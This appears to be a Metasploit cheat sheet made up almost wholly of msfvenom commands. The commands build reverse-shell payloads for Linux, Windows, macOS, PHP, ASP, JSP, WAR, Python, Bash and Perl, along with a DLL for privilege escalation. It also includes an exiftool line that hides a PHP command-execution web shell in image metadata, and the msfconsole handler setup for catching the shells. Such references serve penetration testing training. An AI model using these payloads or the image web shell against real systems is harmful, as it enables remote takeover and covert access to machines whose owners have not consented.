Multiple payloads can be created with these modules, which helps you get a shell in almost any situation.
For each of these payloads we need to go into msfconsole and select exploit/multi/handler. Run 'set payload' for the relevant payload and configure all necessary options (LHOST, LPORT, and so on).
Start database:
$ msfdb init
$ service postgresql start
List Available Payloads:
$ msfvenom -l
Binary Payloads:
1. Linux
$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST="YOUR-IP-ADDRESS" LPORT="YOUR-PORT" -f elf > shell.elf
2. Windows
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST="YOUR-IP-ADDRESS" LPORT="YOUR-PORT" -f exe > shell.exe
3. Mac
$ msfvenom -p osx/x86/shell_reverse_tcp LHOST="YOUR-IP-ADDRESS" LPORT="YOUR-PORT" -f macho > shell.macho
Web Payloads:
1. PHP
$ msfvenom -p php/meterpreter/reverse_tcp LHOST="YOUR-IP-ADDRESS" LPORT="YOUR-LOCAL-PORT" -e php/base64 R > shell.php
2. ASP
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST="YOUR-IP-ADDRESS" LPORT="YOUR-PORT" -f asp > shell.asp
3. JSP
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST="YOUR-IP-ADDRESS" LPORT="YOUR-PORT" -f raw > shell.jsp
4. War
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST="YOUR-IP-ADDRESS" LPORT="YOUR-PORT" -f war > shell.war
Scripting Payloads:
1. Python
$ msfvenom -p cmd/unix/reverse_python LHOST="YOUR-IP-ADDRESS" LPORT="YOUR-PORT" -f raw > shell.py
2. Bash
$ msfvenom -p cmd/unix/reverse_bash LHOST="YOUR-IP-ADDRESS" LPORT="YOUR-PORT" -f raw > shell.sh
3. Perl
$ msfvenom -p cmd/unix/reverse_perl LHOST="YOUR-IP-ADDRESS" LPORT="YOUR-PORT" -f raw > shell.pl
4. Image
$ exiftool -DocumentName="<h1>Laladee<br><?php if(isset(\$_REQUEST['cmd'])){echo '<pre>';\$cmd = (\$_REQUEST['cmd']);system(\$cmd);echo '</pre>';} __halt_compiler();?></h1>" image.jpeg
5. Dll
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST="YOUR-IP-ADDRESS" LPORT="YOUR-PORT" -f dll > privesc.dll
Create Handlers
$ msfconsole
msf > use exploit/multi/handler
msf exploit(multi/handler) > set LHOST <host>
msf exploit(multi/handler) > set LPORT <port>
msf exploit(multi/handler) > set PAYLOAD <payload>
msf exploit(multi/handler) > set ExitOnSession false
msf exploit(multi/handler) > exploit -j -z
Load Custom Payloads
Metasploit allows you to generate a payload and use it during an attack. To use this function, generate your payload before running your attack and, once you are done, use "payload/generic/custom" to specify the payload to use.
$ msfconsole
msf > use payload/generic/custom
msf payload(custom) > show options
msf payload(custom) > set PAYLOADFILE /path/to/the/payload
msf payload(custom) > set PAYLOADSTR the_payload_string_to_use
Read more: neoslab.com